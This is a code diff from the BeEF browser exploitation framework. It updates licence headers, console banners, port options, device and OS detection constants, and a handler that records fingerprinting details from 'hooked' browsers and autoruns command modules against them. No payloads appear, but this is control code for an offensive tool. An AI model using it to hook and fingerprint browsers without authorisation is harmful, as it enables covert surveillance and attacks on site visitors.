-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/main/configuration.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
@@ -118,7 +108,9 @@ module BeEF
       # Load module configurations
       def load_modules_config
         self.set('beef.module', {})
-        Dir.glob("#{$root_dir}/modules/**/*/config.yaml") do | cf |
+        # support nested sub-categories, like browser/hooked_domain/ajax_fingerprint
+        module_configs = File.join("#{$root_dir}/modules/**", "config.yaml")
+        Dir.glob(module_configs) do | cf |
           y = self.load(cf)
           if y != nil
             y['beef']['module'][y['beef']['module'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')

core/main/console/banners.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
@@ -40,12 +30,13 @@ module Banners
     def print_welcome_msg
         config = BeEF::Core::Configuration.instance
         version = config.get('beef.version')
-        print_info "Browser Exploitation Framework (BeEF)"
-        data =  "Version #{version}\n"
-        data += "Website http://beefproject.com\n"
-        data += "Run 'beef -h' for basic help.\n"
-        data += "Run 'git pull' to update to the latest revision."
+        print_info "Browser Exploitation Framework (BeEF) #{version}"
+        data = "Twit: @beefproject\n"
+        data += "Site: http://beefproject.com\n"
+        data += "Blog: http://blog.beefproject.com\n"
+        data += "Wiki: https://github.com/beefproject/beef/wiki\n"
         print_more data
+        print_info "Project Creator: " + "Wade Alcorn".red + " (@WadeAlcorn)"
     end
 
     #
@@ -89,11 +80,13 @@ module Banners
 
     def print_network_interfaces_routes
       configuration = BeEF::Core::Configuration.instance
+      prototxt = configuration.get("beef.http.https.enable") == true ? "https" : "http"
       
       self.interfaces.map do |host| # display the important URLs on each interface from the interfaces array
         print_success "running on network interface: #{host}"
-        data = "Hook URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
-        data += "UI URL:   http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
+        beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
+        data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
+        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
         
         print_more data
       end
@@ -104,13 +97,12 @@ module Banners
     #
     def print_loaded_extensions
       extensions = BeEF::Extensions.get_loaded
-      print_info "#{extensions.size} extensions loaded:"
+      print_info "#{extensions.size} extensions enabled."
       output = ''
-      
-      
-      extensions.each do |key,ext|
-        output += "#{ext['name']}\n"
-      end
+
+      #extensions.each do |key,ext|
+      #  output += "#{ext['name']}\n"
+      #end
       
       print_more output
     end

core/main/console/commandline.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
@@ -26,6 +16,9 @@ module BeEF
         @options[:resetdb] = false
         @options[:ascii_art] = false
         @options[:ext_config] = ""
+        @options[:port] = ""
+        @options[:ws_port] = ""
+
 
         @already_parsed = false
 
@@ -53,6 +46,14 @@ module BeEF
               opts.on('-c', '--config FILE', 'Load a different configuration file: if it\'s called custom-config.yaml, git automatically ignores it.') do |f|
                 @options[:ext_config] = f
               end
+
+              opts.on('-p', '--port PORT', 'Change the default BeEF listening port') do |p|
+                @options[:port] = p
+              end
+
+              opts.on('-w', '--wsport WS_PORT', 'Change the default BeEF WebSocket listening port') do |ws_port|
+                @options[:ws_port] = ws_port
+              end
             end
 
             optparse.parse!

core/main/constants/browsers.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/main/constants/commandmodule.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/main/constants/distributedengine.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/main/constants/hardware.rb

@@ -0,0 +1,81 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+module Core
+module Constants
+  
+  # @note The hardware's strings for hardware detection.
+  module Hardware
+
+    HW_UNKNOWN_IMG        = 'pc.png'
+	HW_VM_IMG             = 'vm.png'
+	HW_LAPTOP_IMG         = 'laptop.png'
+	HW_IPHONE_UA_STR      = 'iPhone'
+ 	HW_IPHONE_IMG         = 'iphone.jpg'
+	HW_IPAD_UA_STR	      = 'iPad'
+	HW_IPAD_IMG	          = 'ipad.png'
+	HW_IPOD_UA_STR	      = 'iPod'
+	HW_IPOD_IMG	          = 'ipod.jpg'
+	HW_BLACKBERRY_UA_STR  = 'BlackBerry'
+	HW_BLACKBERRY_IMG     = 'blackberry.png'
+	HW_WINPHONE_UA_STR    = 'Windows Phone'
+	HW_WINPHONE_IMG       = 'win.png'
+    HW_ZUNE_UA_STR        = 'ZuneWP7'
+    HW_ZUNE_IMG           = 'zune.gif'
+	HW_KINDLE_UA_STR      = 'Kindle'
+	HW_KINDLE_IMG         = 'kindle.png'
+	HW_NOKIA_UA_STR       = 'Nokia'
+	HW_NOKIA_IMG          = 'nokia.ico'
+	HW_HTC_UA_STR         = 'HTC'
+	HW_HTC_IMG            = 'htc.ico'
+	HW_MOTOROLA_UA_STR    = 'motorola'
+	HW_MOTOROLA_IMG       = 'motorola.png'
+	HW_GOOGLE_UA_STR      = 'Nexus One'
+	HE_GOOGLE_IM          = 'nexus.png'
+	HW_ERICSSON_UA_STR    = 'Ericsson'
+	HW_ERICSSON_IMG       = 'sony_ericsson.png'
+	HW_ALL_UA_STR         = 'All'
+
+        # Attempt to match operating system string to constant
+        # @param [String] name Name of operating system
+        # @return [String] Constant name of matched operating system, returns 'ALL'  if nothing are matched
+		def self.match_hardware(name)
+			case name.downcase
+				when /iphone/
+					HW_IPHONE_UA_STR
+				when /ipad/
+					HW_IPAD_UA_STR
+				when /ipod/
+					HW_IPOD_UA_STR
+				when /blackberry/
+					HW_BLACKBERRY_UA_STR
+				when /windows phone/
+					HW_WINPHONE_UA_STR
+				when /zune/
+					HW_ZUNE_UA_STR
+				when /kindle/
+					HW_KINDLE_UA_STR
+				when /nokia/
+					HW_NOKIA_UA_STR
+				when /motorola/
+					HW_MOTOROLA_UA_STR
+				when /htc/
+					HW_HTC_UA_STR
+				when /google/
+					HW_GOOGLE_UA_STR
+				when /ericsson/
+					HW_ERICSSON_UA_STR
+				else
+					'ALL'
+				end
+		end
+	
+  end
+  
+end
+end
+end

core/main/constants/os.rb

@@ -1,89 +1,78 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
-module Core
-module Constants
-  
-  # @note The OS'es strings for os detection.
-  module Os
-  
-    OS_UNKNOWN_IMG        = 'unknown.png'
-  	OS_WINDOWS_UA_STR     = 'Windows'
-  	OS_WINDOWS_IMG        = 'win.png'
-  	OS_LINUX_UA_STR       = 'Linux'
-  	OS_LINUX_IMG          = 'linux.png'
-  	OS_MAC_UA_STR         = 'Mac'
-  	OS_MAC_IMG            = 'mac.png'
-	OS_QNX_UA_STR	      = 'QNX'
-	OS_QNX_IMG	      = 'qnx.ico'
-	OS_BEOS_UA_STR	      = 'BeOS'
-	OS_BEOS_IMG	      = 'beos.png'
-	OS_OPENBSD_UA_STR     = 'OpenBSD'
-	OS_OPENBSD_IMG	      = 'openbsd.ico'
-	OS_IPHONE_UA_STR      = 'iPhone'
- 	OS_IPHONE_IMG         = 'iphone.png'
-	OS_IPAD_UA_STR	      = 'iPad'
-	OS_IPAD_IMG	      = 'ipad.png'
-	OS_IPOD_UA_STR	      = 'iPod'
-	OS_IPOD_IMG	      = 'ipod.jpg'
-	OS_MAEMO_UA_STR	      = 'Maemo'
-	OS_MAEMO_IMG	      = 'maemo.ico'
-	OS_BLACKBERRY_UA_STR  = 'BlackBerry'
-	OS_BLACKBERRY_IMG     = 'blackberry.png'
-	OS_ANDROID_UA_STR     = 'Android'
-	OS_ANDROID_IMG        = 'android.png'
-    OS_ALL_UA_STR         = 'All'
+  module Core
+    module Constants
+
+      # @note The OS'es strings for os detection.
+      module Os
+
+        OS_UNKNOWN_IMG = 'unknown.png'
+        OS_WINDOWS_UA_STR = 'Windows'
+        OS_WINDOWS_IMG = 'win.png'
+        OS_LINUX_UA_STR = 'Linux'
+        OS_LINUX_IMG = 'linux.png'
+        OS_MAC_UA_STR = 'Mac'
+        OS_MAC_IMG = 'mac.png'
+        OS_QNX_UA_STR = 'QNX'
+        OS_QNX_IMG = 'qnx.ico'
+        OS_BEOS_UA_STR = 'BeOS'
+        OS_BEOS_IMG = 'beos.png'
+        OS_OPENBSD_UA_STR = 'OpenBSD'
+        OS_OPENBSD_IMG = 'openbsd.ico'
+        OS_IOS_UA_STR = 'iOS'
+        OS_IOS_IMG = 'ios.png'
+        OS_IPHONE_UA_STR = 'iPhone'
+        OS_WEBOS_UA_STR = 'webos.png'
+        OS_IPHONE_IMG = 'iphone.jpg'
+        OS_IPAD_UA_STR = 'iPad'
+        OS_IPAD_IMG = 'ipad.png'
+        OS_IPOD_UA_STR = 'iPod'
+        OS_IPOD_IMG = 'ipod.jpg'
+        OS_MAEMO_UA_STR = 'Maemo'
+        OS_MAEMO_IMG = 'maemo.ico'
+        OS_BLACKBERRY_UA_STR = 'BlackBerry'
+        OS_BLACKBERRY_IMG = 'blackberry.png'
+        OS_ANDROID_UA_STR = 'Android'
+        OS_ANDROID_IMG = 'android.png'
+        OS_ALL_UA_STR = 'All'
 
         # Attempt to match operating system string to constant
         # @param [String] name Name of operating system
         # @return [String] Constant name of matched operating system, returns 'ALL'  if nothing are matched
-		def self.match_os(name)
-			case name.downcase
-				when /win/
-					OS_WINDOWS_UA_STR
-				when /lin/
-					OS_LINUX_UA_STR
-				when /os x/, /osx/, /mac/
-					OS_MAC_UA_STR
-				when /qnx/
-					OS_QNX_UA_STR
-				when /beos/
-					OS_BEOS_UA_STR
-				when /openbsd/
-					OS_OPENBSD_UA_STR
-				when /iphone/
-					OS_IPHONE_UA_STR
-				when /ipad/
-					OS_IPAD_UA_STR
-				when /ipod/
-					OS_IPOD_UA_STR
-				when /maemo/
-					OS_MAEMO_UA_STR
-				when /blackberry/
-					OS_BLACKBERRY_UA_STR
-				when /android/
-					OS_ANDROID_UA_STR
-				else
-					'ALL'
-				end
-		end
-	
+        def self.match_os(name)
+          case name.downcase
+            when /win/
+              OS_WINDOWS_UA_STR
+            when /lin/
+              OS_LINUX_UA_STR
+            when /os x/, /osx/, /mac/
+              OS_MAC_UA_STR
+            when /qnx/
+              OS_QNX_UA_STR
+            when /beos/
+              OS_BEOS_UA_STR
+            when /openbsd/
+              OS_OPENBSD_UA_STR
+            when /ios/, /iphone/, /ipad/, /ipod/
+              OS_IOS_UA_STR
+            when /maemo/
+              OS_MAEMO_UA_STR
+            when /blackberry/
+              OS_BLACKBERRY_UA_STR
+            when /android/
+              OS_ANDROID_UA_STR
+            else
+              'ALL'
+          end
+        end
+
+      end
+
+    end
   end
-  
-end
-end
 end

core/main/crypto.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/main/distributed_engine/models/rules.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/main/handlers/browserdetails.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
@@ -34,6 +24,9 @@ module BeEF
         end
 
         def setup()
+          print_debug "[INIT] Processing Browser Details..."
+          config = BeEF::Core::Configuration.instance
+
           # validate hook session value
           session_id = get_param(@data, 'beefhook')
           (self.err_msg "session id is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(session_id)
@@ -118,6 +111,22 @@ module BeEF
             self.err_msg "Invalid operating system name returned from the hook browser's initial connection."
           end
 
+          # get and store the hardware name
+          hw_name = get_param(@data['results'], 'Hardware')
+          if BeEF::Filters.is_valid_hwname?(hw_name)
+            BD.set(session_id, 'Hardware', hw_name)
+          else
+            self.err_msg "Invalid hardware name returned from the hook browser's initial connection."
+          end
+
+          # get and store the date
+          date_stamp = get_param(@data['results'], 'DateStamp')
+          if BeEF::Filters.is_valid_date_stamp?(date_stamp)
+            BD.set(session_id, 'DateStamp', date_stamp)
+          else
+            self.err_msg "Invalid date returned from the hook browser's initial connection."
+          end
+
           # get and store page title
           page_title = get_param(@data['results'], 'PageTitle')
           if BeEF::Filters.is_valid_pagetitle?(page_title)
@@ -159,11 +168,11 @@ module BeEF
           end
 
           # get and store the system platform
-          system_platform = get_param(@data['results'], 'SystemPlatform')
+          system_platform = get_param(@data['results'], 'BrowserPlatform')
           if BeEF::Filters.is_valid_system_platform?(system_platform)
-            BD.set(session_id, 'SystemPlatform', system_platform)
+            BD.set(session_id, 'BrowserPlatform', system_platform)
           else
-            self.err_msg "Invalid system platform returned from the hook browser's initial connection."
+            self.err_msg "Invalid browser platform returned from the hook browser's initial connection."
           end
 
           # get and store the hooked browser type
@@ -175,11 +184,11 @@ module BeEF
           end
 
           # get and store the zombie screen size and color depth
-          screen_params = get_param(@data['results'], 'ScreenParams')
-          if BeEF::Filters.is_valid_screen_params?(screen_params)
-            BD.set(session_id, 'ScreenParams', screen_params)
+          screen_size = get_param(@data['results'], 'ScreenSize')
+          if BeEF::Filters.is_valid_screen_size?(screen_size)
+            BD.set(session_id, 'ScreenSize', screen_size)
           else
-            self.err_msg "Invalid screen params returned from the hook browser's initial connection."
+            self.err_msg "Invalid screen size returned from the hook browser's initial connection."
           end
 
           # get and store the window size
@@ -214,6 +223,14 @@ module BeEF
             self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasPhonegap
+          has_phonegap = get_param(@data['results'], 'HasPhonegap')
+          if BeEF::Filters.is_valid_yes_no?(has_phonegap)
+            BD.set(session_id, 'HasPhonegap', has_phonegap)
+          else
+            self.err_msg "Invalid value for HasPhonegap returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasGoogleGears
           has_googlegears = get_param(@data['results'], 'HasGoogleGears')
           if BeEF::Filters.is_valid_yes_no?(has_googlegears)
@@ -222,6 +239,14 @@ module BeEF
             self.err_msg "Invalid value for HasGoogleGears returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasFoxit
+          has_foxit = get_param(@data['results'], 'HasFoxit')
+          if BeEF::Filters.is_valid_yes_no?(has_foxit)
+            BD.set(session_id, 'HasFoxit', has_foxit)
+          else
+            self.err_msg "Invalid value for HasFoxit returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasWebSocket
           has_web_socket = get_param(@data['results'], 'HasWebSocket')
           if BeEF::Filters.is_valid_yes_no?(has_web_socket)
@@ -238,6 +263,62 @@ module BeEF
             self.err_msg "Invalid value for HasActiveX returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasSilverlight
+          has_silverlight = get_param(@data['results'], 'HasSilverlight')
+          if BeEF::Filters.is_valid_yes_no?(has_silverlight)
+            BD.set(session_id, 'HasSilverlight', has_silverlight)
+          else
+            self.err_msg "Invalid value for HasSilverlight returned from the hook browser's initial connection."
+          end
+
+          # get and store the yes|no value for HasQuickTime
+          has_quicktime = get_param(@data['results'], 'HasQuickTime')
+          if BeEF::Filters.is_valid_yes_no?(has_quicktime)
+            BD.set(session_id, 'HasQuickTime', has_quicktime)
+          else
+            self.err_msg "Invalid value for HasQuickTime returned from the hook browser's initial connection."
+          end
+
+          # get and store the yes|no value for HasRealPlayer
+          has_realplayer = get_param(@data['results'], 'HasRealPlayer')
+          if BeEF::Filters.is_valid_yes_no?(has_realplayer)
+            BD.set(session_id, 'HasRealPlayer', has_realplayer)
+          else
+            self.err_msg "Invalid value for HasRealPlayer returned from the hook browser's initial connection."
+          end
+
+          # get and store the yes|no value for HasWMP
+          has_wmp = get_param(@data['results'], 'HasWMP')
+          if BeEF::Filters.is_valid_yes_no?(has_wmp)
+            BD.set(session_id, 'HasWMP', has_wmp)
+          else
+            self.err_msg "Invalid value for HasWMP returned from the hook browser's initial connection."
+          end
+
+          # get and store the yes|no value for HasVLC
+          has_vlc = get_param(@data['results'], 'HasVLC')
+          if BeEF::Filters.is_valid_yes_no?(has_vlc)
+            BD.set(session_id, 'HasVLC', has_vlc)
+          else
+            self.err_msg "Invalid value for HasVLC returned from the hook browser's initial connection."
+          end
+
+          # get and store the value for CPU
+          cpu_type = get_param(@data['results'], 'CPU')
+          if !cpu_type.nil?
+            BD.set(session_id, 'CPU', cpu_type)
+          else
+            self.err_msg "Invalid value for CPU returned from the hook browser's initial connection."
+          end
+
+          # get and store the value for TouchEnabled
+          touch_enabled = get_param(@data['results'], 'TouchEnabled')
+          if BeEF::Filters.is_valid_yes_no?(touch_enabled)
+            BD.set(session_id, 'TouchEnabled', touch_enabled)
+          else
+            self.err_msg "Invalid value for TouchEnabled returned from the hook browser's initial connection."
+          end
+
           # get and store whether the browser has session cookies enabled
           has_session_cookies = get_param(@data['results'], 'hasSessionCookies')
           if BeEF::Filters.is_valid_yes_no?(has_session_cookies)
@@ -255,23 +336,29 @@ module BeEF
           end
 
           # log a few info of newly hooked zombie in the console
-          print_info "New Hooked Browser [ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
+          print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
 
 
           # Call autorun modules
-          autorun = []
-          BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
-            if v.has_key?('autorun') and v['autorun'] == true
-              if BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name}) == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
-                BeEF::Module.execute(k, session_id)
-                autorun.push(k)
-              else
-                print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser #{zombie.ip}"
+          if config.get('beef.autorun.enable')
+            autorun = []
+            BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
+              if v.has_key?('autorun') and v['autorun'] == true
+                target_status = BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name})
+                if target_status == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
+                  BeEF::Module.execute(k, session_id)
+                  autorun.push(k)
+                elsif target_status == BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY and config.get('beef.autorun.allow_user_notify')
+                  BeEF::Module.execute(k, session_id)
+                  autorun.push(k)
+                else
+                  print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
+                end
               end
+            }
+            if autorun.length > 0
+              print_info "Autorun executed[#{autorun.join(', ')}] against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
             end
-          }
-          if autorun.length > 0
-            print_info "Autorun executed: #{autorun.join(', ')} against Hooked browser #{zombie.ip}"
           end
         end
 

core/main/handlers/commands.rb

@@ -1,92 +1,81 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Core
-module Handlers
-  
-  class Commands
-    
-    include BeEF::Core::Handlers::Modules::BeEFJS
-    include BeEF::Core::Handlers::Modules::Command
-    
-    @data = {}
-    
-    # Handles command data
-    # @param [Hash] data Data from command execution
-    # @param [Class] kclass Class of command
-    # @todo Confirm argument data variable type.
-    def initialize(data, kclass)
-      @kclass = BeEF::Core::Command.const_get(kclass.capitalize)
-      @data = data
-      setup()
-    end
-    
-    # Initial setup function, creates the command module and saves details to datastore
-    def setup()
+  module Core
+    module Handlers
+
+      class Commands
+
+        include BeEF::Core::Handlers::Modules::BeEFJS
+        include BeEF::Core::Handlers::Modules::Command
+
+        @data = {}
+
+        # Handles command data
+        # @param [Hash] data Data from command execution
+        # @param [Class] kclass Class of command
+        # @todo Confirm argument data variable type [radoen]: type is Hash confirmed.
+        def initialize(data, kclass)
+          @kclass = BeEF::Core::Command.const_get(kclass.capitalize)
+          @data = data
+          setup()
+        end
+
+        # Initial setup function, creates the command module and saves details to datastore
+        def setup()
 
 
-      @http_params = @data['request'].params
-      @http_header = Hash.new
-      http_header = @data['request'].env.select {|k,v| k.to_s.start_with? 'HTTP_'}
-                      .each {|key,value|
-                            @http_header[key.sub(/^HTTP_/, '')] = value
-                      }
+          @http_params = @data['request'].params
+          @http_header = Hash.new
+          http_header = @data['request'].env.select { |k, v| k.to_s.start_with? 'HTTP_' }.each { |key, value|
+            @http_header[key.sub(/^HTTP_/, '')] = value
+          }
 
-      # @note get and check command id from the request
-      command_id  = get_param(@data, 'cid')
-      # @todo ruby filter needs to be updated to detect fixnums not strings
-      command_id = command_id.to_s()
-      (print_error "command_id is invalid";return) if not BeEF::Filters.is_valid_command_id?(command_id.to_s())
+          # @note get and check command id from the request
+          command_id = get_param(@data, 'cid')
+          # @todo ruby filter needs to be updated to detect fixnums not strings
+          command_id = command_id.to_s()
+          (print_error "command_id is invalid"; return) if not BeEF::Filters.is_valid_command_id?(command_id.to_s())
 
-      # @note get and check session id from the request
-      beefhook = get_param(@data, 'beefhook')
-      (print_error "BeEFhook is invalid";return) if not BeEF::Filters.is_valid_hook_session_id?(beefhook)
+          # @note get and check session id from the request
+          beefhook = get_param(@data, 'beefhook')
+          (print_error "BeEFhook is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(beefhook)
 
-	  result = get_param(@data, 'results')
+          result = get_param(@data, 'results')
+
+          # @note create the command module to handle the response
+          command = @kclass.new(BeEF::Module.get_key_by_class(@kclass))
+          command.build_callback_datastore(@http_params, @http_header, result, command_id, beefhook)
+          command.session_id = beefhook
+          if command.respond_to?(:post_execute)
+            command.post_execute
+          end
+          #@todo this is the part that store result on db and the modify will be accessible from all the framework and so UI too
+          # @note get/set details for datastore and log entry
+          command_friendly_name = command.friendlyname
+          (print_error "command friendly name is empty"; return) if command_friendly_name.empty?
+          command_results = get_param(@data, 'results')
+          (print_error "command results are empty"; return) if command_results.empty?
+          # @note save the command module results to the datastore and create a log entry
+          command_results = {'data' => command_results}
+          BeEF::Core::Models::Command.save_result(beefhook, command_id, command_friendly_name, command_results)
+
+        end
+
+        # Returns parameter from hash
+        # @param [Hash] query Hash of data to return data from
+        # @param [String] key Key to search for and return inside `query`
+        # @return Value referenced in hash at the supplied key
+        def get_param(query, key)
+          return (query.class == Hash and query.has_key?(key)) ? query[key] : nil
